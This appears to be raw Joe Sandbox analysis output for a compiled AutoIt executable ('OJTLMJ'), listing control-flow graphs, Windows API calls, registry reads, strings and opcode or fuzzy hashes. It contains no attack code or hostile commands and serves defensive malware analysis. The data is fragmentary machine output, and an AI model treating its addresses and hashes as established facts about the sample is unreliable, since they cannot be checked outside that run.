                                                                                                                control_flow_graph 1169 d43dcb-d43df1 call d43f9b 1172 db39f9-db3a09 call d8cc82 1169->1172 1173 d43df7-d43e04 call d43f9b 1169->1173 1176 db3a0e-db3a10 1172->1176 1173->1172 1180 d43e0a-d43e10 1173->1180 1178 db3a2f-db3a77 call d6010a 1176->1178 1179 db3a12-db3a15 call d43e39 1176->1179 1190 db3a79-db3a96 call d5ac65 1178->1190 1191 db3a98 1178->1191 1183 db3a1a-db3a29 call d8757b 1179->1183 1180->1183 1184 d43e16-d43e36 call d4bdf0 1180->1184 1183->1178 1192 db3a9a-db3aad 1190->1192 1191->1192 1194 db3ab3 1192->1194 1195 db3c24-db3c27 call d628ca 1192->1195 1197 db3aba-db3abd call d83460 1194->1197 1200 db3c2c-db3c35 call d43e39 1195->1200 1202 db3ac2-db3ae4 call d4b7ff call d8a5be 1197->1202 1205 db3c37-db3c47 call d45800 call d8a46f 1200->1205 1212 db3af8-db3b02 call d8a5a8 1202->1212 1213 db3ae6-db3af3 1202->1213 1219 db3c4c-db3c7c call d832b0 call d6017e call d628ca call d43e39 1205->1219 1221 db3b1c-db3b26 call d8a592 1212->1221 1222 db3b04-db3b17 1212->1222 1215 db3beb-db3bfb call d4b6d0 1213->1215 1215->1202 1225 db3c01-db3c0b call d4a870 1215->1225 1219->1205 1229 db3b3a-db3b44 call d5df5b 1221->1229 1230 db3b28-db3b35 1221->1230 1222->1215 1232 db3c10-db3c1e 1225->1232 1229->1215 1237 db3b4a-db3b62 call d830ac 1229->1237 1230->1215 1232->1195 1232->1197 1243 db3b85-db3b88 1237->1243 1244 db3b64-db3b83 call d4caee call d45cd3 1237->1244 1245 db3b8a-db3b8d call d4caee 1243->1245 1246 db3bb6-db3bb9 1243->1246 1267 db3ba6-db3bb4 call d4b7ff 1244->1267 1252 db3b92-db3ba5 call d834b4 call d45cd3 1245->1252 1250 db3bbb-db3bc4 call d82fcd 1246->1250 1251 db3bd9-db3bdc call d8a525 1246->1251 1250->1219 1262 db3bca-db3bd4 call d6017e 1250->1262 1256 db3be1-db3bea call d6017e 1251->1256 1252->1267 1256->1215 1262->1202 1267->1256
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D43F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D434E2,?,00000001), ref: 00D43FCD
                                                                                                                • _free.LIBCMT ref: 00DB3C27
                                                                                                                • _free.LIBCMT ref: 00DB3C6E
                                                                                                                  • Part of subcall function 00D4BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E022E8,?,00000000,?,00D43E2E,?,00000000,?,00DDDBF0,00000000,?), ref: 00D4BE8B
                                                                                                                  • Part of subcall function 00D4BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D43E2E,?,00000000,?,00DDDBF0,00000000,?,00000002), ref: 00D4BEA7
                                                                                                                  • Part of subcall function 00D4BDF0: __wsplitpath.LIBCMT ref: 00D4BF19
                                                                                                                  • Part of subcall function 00D4BDF0: _wcscpy.LIBCMT ref: 00D4BF31
                                                                                                                  • Part of subcall function 00D4BDF0: _wcscat.LIBCMT ref: 00D4BF46
                                                                                                                  • Part of subcall function 00D4BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00D4BF56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                • API String ID: 1510338132-1757145024
                                                                                                                • Opcode ID: a03607e96065e5b1c17fe1e1f990b6a0e88b8ec8fddaecb851b34c9c6117c81f
                                                                                                                • Instruction ID: bbe3924e598ac18b934c12dee10a18a1201c0732cf839d98b358f17940def81c
                                                                                                                • Opcode Fuzzy Hash: a03607e96065e5b1c17fe1e1f990b6a0e88b8ec8fddaecb851b34c9c6117c81f
                                                                                                                • Instruction Fuzzy Hash: 83913971910259EFCF04EFA8CC919EEB7B4FF05310F14452AE856AB291EB34AA05DB70

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1272 d6413e-d6415b call d67750 1275 d64174-d64180 1272->1275 1276 d6415d-d64168 call d6889e call d67aa0 1272->1276 1275->1276 1278 d64182-d6418c 1275->1278 1283 d6416d-d6416f 1276->1283 1278->1276 1280 d6418e-d6419a call d6f278 1278->1280 1286 d6419c-d641a7 call d6889e 1280->1286 1287 d641a9-d641b1 1280->1287 1285 d641f4-d641f9 call d67795 1283->1285 1286->1283 1288 d641d3-d641d9 call d6f390 1287->1288 1289 d641b3-d641d1 call d6889e call d6f630 1287->1289 1297 d641de-d641f2 call d64200 1288->1297 1289->1283 1297->1285
                                                                                                                APIs
                                                                                                                • __getstream.LIBCMT ref: 00D6418E
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D641C9
                                                                                                                • __wopenfile.LIBCMT ref: 00D641D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                • String ID: <G
                                                                                                                • API String ID: 1820251861-2138716496
                                                                                                                • Opcode ID: 7f6475d3d6210c49d09ee31761be1411e762b0c2a07a2f357f47d7a6ca95b61d
                                                                                                                • Instruction ID: 161143d9ca704097343ca3b6a086a761f9695aa263b55f62b4d735e8ed8c0c98
                                                                                                                • Opcode Fuzzy Hash: 7f6475d3d6210c49d09ee31761be1411e762b0c2a07a2f357f47d7a6ca95b61d
                                                                                                                • Instruction Fuzzy Hash: EF11C67090030AAFDB10BFB49C4266F3BA4FF66364B198525A419DB281EB78C9819771

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1302 d5c955-d5c960 1303 d5c9d2-d5c9d4 1302->1303 1304 d5c962-d5c967 1302->1304 1306 d5c9c5-d5c9c8 1303->1306 1304->1303 1305 d5c969-d5c981 RegOpenKeyExW 1304->1305 1305->1303 1307 d5c983-d5c9a2 RegQueryValueExW 1305->1307 1308 d5c9a4-d5c9af 1307->1308 1309 d5c9b9-d5c9c4 RegCloseKey 1307->1309 1310 d5c9b1-d5c9b3 1308->1310 1311 d5c9c9-d5c9d0 1308->1311 1309->1306 1312 d5c9b7 1310->1312 1311->1312 1312->1309
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00D5C948,SwapMouseButtons,00000004,?), ref: 00D5C979
                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00D5C948,SwapMouseButtons,00000004,?,?,?,?,00D5BF22), ref: 00D5C99A
                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,00D5C948,SwapMouseButtons,00000004,?,?,?,?,00D5BF22), ref: 00D5C9BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 6e9aa1d52572b080dfc9246dd92172faaa7c8f029d2443bb2a3c1cba7ddc966d
                                                                                                                • Instruction ID: 32831fc60217ab4fdd0348443dc456746ce9134a63aea31869923a5915a1b15a
                                                                                                                • Opcode Fuzzy Hash: 6e9aa1d52572b080dfc9246dd92172faaa7c8f029d2443bb2a3c1cba7ddc966d
                                                                                                                • Instruction Fuzzy Hash: BA117C75521309BFDF118F68DC44EAEB7B8EF04746F00542AAC41E7210E2319E44AFB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D441A7: _fseek.LIBCMT ref: 00D441BF
                                                                                                                  • Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF49
                                                                                                                  • Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF5C
                                                                                                                • _free.LIBCMT ref: 00D8CDC9
                                                                                                                • _free.LIBCMT ref: 00D8CDD0
                                                                                                                • _free.LIBCMT ref: 00D8CE3B
                                                                                                                  • Part of subcall function 00D628CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D68715,00000000,00D688A3,00D64673,?), ref: 00D628DE
                                                                                                                  • Part of subcall function 00D628CA: GetLastError.KERNEL32(00000000,?,00D68715,00000000,00D688A3,00D64673,?), ref: 00D628F0
                                                                                                                • _free.LIBCMT ref: 00D8CE43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1552873950-0
                                                                                                                • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                • Instruction ID: 5bca69db0773c2c23341f2bda94104127db00e6a6b52583021a3c69a630781f6
                                                                                                                • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                • Instruction Fuzzy Hash: D1511CB1904218AFDF15AF64CC81BAEBBB9EF48340F1044AEF659A3251D7715A808F79
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DB3CF1
                                                                                                                • GetOpenFileNameW.COMDLG32(?,?,00000001,00E022E8), ref: 00DB3D35
                                                                                                                  • Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA
                                                                                                                  • Part of subcall function 00D43A67: SHGetMalloc.SHELL32(00D43C31), ref: 00D43A7D
                                                                                                                  • Part of subcall function 00D43A67: SHGetDesktopFolder.SHELL32(?), ref: 00D43A8F
                                                                                                                  • Part of subcall function 00D43A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00D43AD2
                                                                                                                  • Part of subcall function 00D43B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00E022E8,?), ref: 00D43B65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                • String ID: X
                                                                                                                • API String ID: 3714316930-3081909835
                                                                                                                • Opcode ID: dd52fee702e9554556bdc655aa9b34508b4b6410aee066da0ef9cb4fb2de75a2
                                                                                                                • Instruction ID: 8d89d76fd1db975eec31bdeb7066d77a2cd28d96bd0180aaec164bbb7f20ffc1
                                                                                                                • Opcode Fuzzy Hash: dd52fee702e9554556bdc655aa9b34508b4b6410aee066da0ef9cb4fb2de75a2
                                                                                                                • Instruction Fuzzy Hash: 7D11C6B1A00298ABCF05DFD8D8456EEBBF9EF45704F04800AE541BB341CBB54A498FB1
                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(00D43C31), ref: 00D43A7D
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00D43AD2
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00D43A8F
                                                                                                                  • Part of subcall function 00D43B1E: _wcsncpy.LIBCMT ref: 00D43B32
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3981382179-0
                                                                                                                • Opcode ID: c1da91be2c4bffaeca0fc258d493267c01a94c4f90db029725d68d19258feca9
                                                                                                                • Instruction ID: 8c8c9d11bb6cb63b3c339026b995c3ef04032d49e428f360fe0d2e9d085a558b
                                                                                                                • Opcode Fuzzy Hash: c1da91be2c4bffaeca0fc258d493267c01a94c4f90db029725d68d19258feca9
                                                                                                                • Instruction Fuzzy Hash: 13215376B00114ABCB14DF99DC84EEE77BDEF88740B1440A4F50AD7251DB309E46CBA0
                                                                                                                APIs
                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00D64603
                                                                                                                  • Part of subcall function 00D68E52: __NMSG_WRITE.LIBCMT ref: 00D68E79
                                                                                                                  • Part of subcall function 00D68E52: __NMSG_WRITE.LIBCMT ref: 00D68E83
                                                                                                                • __NMSG_WRITE.LIBCMT ref: 00D6460A
                                                                                                                  • Part of subcall function 00D68EB2: GetModuleFileNameW.KERNEL32(00000000,00E00312,00000104,?,00000001,00D60127), ref: 00D68F44
                                                                                                                  • Part of subcall function 00D68EB2: ___crtMessageBoxW.LIBCMT ref: 00D68FF2
                                                                                                                  • Part of subcall function 00D61D65: ___crtCorExitProcess.LIBCMT ref: 00D61D6B
                                                                                                                  • Part of subcall function 00D61D65: ExitProcess.KERNEL32 ref: 00D61D74
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                • RtlAllocateHeap.NTDLL(013B0000,00000000,00000001,?,?,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D6462F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1372826849-0
                                                                                                                • Opcode ID: a261c83eb5677dfe0ce4b46b1f0e51e50927f22b4db36cbd25da241d48a31c58
                                                                                                                • Instruction ID: c365cc00f3957a0d3809afea1eb065c4296f052f54f7161f9bdf24cea5cb6fe2
                                                                                                                • Opcode Fuzzy Hash: a261c83eb5677dfe0ce4b46b1f0e51e50927f22b4db36cbd25da241d48a31c58
                                                                                                                • Instruction Fuzzy Hash: 2201F531641301AFEA203BA8EC02BAA3748EFC2761F550125F501AB1C2DFB19C408671
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00D8C45E
                                                                                                                  • Part of subcall function 00D628CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D68715,00000000,00D688A3,00D64673,?), ref: 00D628DE
                                                                                                                  • Part of subcall function 00D628CA: GetLastError.KERNEL32(00000000,?,00D68715,00000000,00D688A3,00D64673,?), ref: 00D628F0
                                                                                                                • _free.LIBCMT ref: 00D8C46F
                                                                                                                • _free.LIBCMT ref: 00D8C481
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                • Instruction ID: bca3f55a2f17e1d7ab04faea934b2fd91b18c41a23d24e16010aa43c0a1d09bc
                                                                                                                • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                • Instruction Fuzzy Hash: E1E017A1710B01D7DA24BA7DAC54FB363CCAF04761B18582EF449D7182DF28F8808238
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 0-4196123274
                                                                                                                • Opcode ID: 08906aa2eea3eacd811cafc9a8edc7321731e606d20e7bf2c7f4dd35c502a6f2
                                                                                                                • Instruction ID: ac26d8a9c0fe6d7dda6b47349f2aa4188c68a6e5ad234e39ce2169134ec42a55
                                                                                                                • Opcode Fuzzy Hash: 08906aa2eea3eacd811cafc9a8edc7321731e606d20e7bf2c7f4dd35c502a6f2
                                                                                                                • Instruction Fuzzy Hash: 9D226C74508341CFDB24DF18C490A6ABBE1FF89305F18895DED9A8B261D771E889CF62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D416F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00D414EB), ref: 00D41751
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D4159B
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00D41612
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00DB58F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3815369404-0
                                                                                                                • Opcode ID: 05b41cd1a940ed845f188cbdc4c6d03d85af91ad046ec4255df406555ef390dd
                                                                                                                • Instruction ID: d514e8e4c7d2e95436cef9800ebfd62cd3e95611bfcae41b02c48ad1cc33575f
                                                                                                                • Opcode Fuzzy Hash: 05b41cd1a940ed845f188cbdc4c6d03d85af91ad046ec4255df406555ef390dd
                                                                                                                • Instruction Fuzzy Hash: 1571AAB89013418FC710DF6BAD91554BBA5F79934479851AEE02ABF3B2DB3244C8CF21
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 4104443479-3962188686
                                                                                                                • Opcode ID: 4263a23bc91a0fba6092ba4e7f8233e48263341b1781ec0a86fa3e511cd1d61d
                                                                                                                • Instruction ID: 0401bdea916ee5229a1fbc172b5657ba5033b7dac66388e05dd37a500c7a1ca9
                                                                                                                • Opcode Fuzzy Hash: 4263a23bc91a0fba6092ba4e7f8233e48263341b1781ec0a86fa3e511cd1d61d
                                                                                                                • Instruction Fuzzy Hash: 2B418D61A043589BDF159B648DA17BF7FA2DF15300F2C4465EAC2EB283CA21CDD487B1
                                                                                                                Strings
                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00DB34AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                • API String ID: 1029625771-2684727018
                                                                                                                • Opcode ID: 3f25a91920f24dc98a90be033b687b75080679a11b627fd15dc34ddccd0fc6cf
                                                                                                                • Instruction ID: 7eda4e4fb450d2738822a3957f968f1f86fdda538e9d6b0b24f3bf2e06132b5a
                                                                                                                • Opcode Fuzzy Hash: 3f25a91920f24dc98a90be033b687b75080679a11b627fd15dc34ddccd0fc6cf
                                                                                                                • Instruction Fuzzy Hash: 08F0FF75905209AF8F15EFA8D8919FFB778EE10310B548526B86692182EB349B09DB31
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00DBDB31
                                                                                                                • IsWindow.USER32(00000000), ref: 00DBDB6B
                                                                                                                  • Part of subcall function 00D41F04: GetForegroundWindow.USER32 ref: 00D41FBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
